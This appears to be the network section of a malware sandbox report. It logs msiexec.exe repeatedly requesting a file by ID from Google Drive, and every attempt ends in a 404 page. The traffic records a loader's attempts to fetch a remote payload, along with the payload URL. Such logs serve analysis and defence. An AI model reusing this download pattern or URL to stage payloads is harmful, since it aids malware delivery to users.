                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:21 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:21 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:21 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: script-src 'nonce-8o8J0dPAf26I73o-ggVfFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.1150000142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:22 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:22 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgTZ4J6zhRp4YYWSLLYOz2LUV9erdwLBPgzWn_9pVfXOPsoORgS09P7A91mDbrba_C9WHh45PSw
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:22 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-6awo2_G_nTMKqICplqMb9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:22 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 37 35 46 4c 31 54 6d 38 6f 37 41 4a 73 75 56 52 33 6c 45 57 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Q75FL1Tm8o7AJsuVR3lEWw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.1150001142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:23 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:24 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:23 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-mJTIcWjojgL9M8GpJy4LQg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.1150002142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:24 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:25 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgRAqpqPIL_uVxjATJnHB4R7Hgdb167rgZi85s6EKTCvxsdeDI7Xlm1T3IgX8YBhb1zJNXm3V2Q
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:24 GMT
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-Q587Fl8PAMrt2tlK1wnAxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:25 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 4d 73 44 53 65 42 69 45 44 45 67 31 4d 6d 58 41 35 38 41 33 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kMsDSeBiEDEg1MmXA58A3A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.1150003142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:25 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:26 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:26 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: script-src 'nonce-yqv1GszUm-nT71h6ZvWZTQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.1150004142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:26 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:27 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgQFBZZnKMRfgTeRIhCvBnEdUmikbaZYZQ4HZgCgZX77xJfcjo9zOx07esj912NV-alw
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:27 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-Tv6WPKivlf6l62SD8PNK3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:27 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 56 33 70 39 78 50 5a 33 79 6b 7a 44 41 30 55 34 47 72 34 69 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dV3p9xPZ3ykzDA0U4Gr4iw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.1150005142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:28 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:28 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:28 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: script-src 'nonce-gO2j-jhBw0Or8avTCUycIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                25192.168.2.1150006142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:29 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:29 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgQ7oiarDp-S-H1oEypFMqlSf4UfUKGh4x2MHb1UPwctkw1qSgB5fozksN0BDYpjx_VipdRqacg
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:29 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-MZ76xVUieR744R2azQWmWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
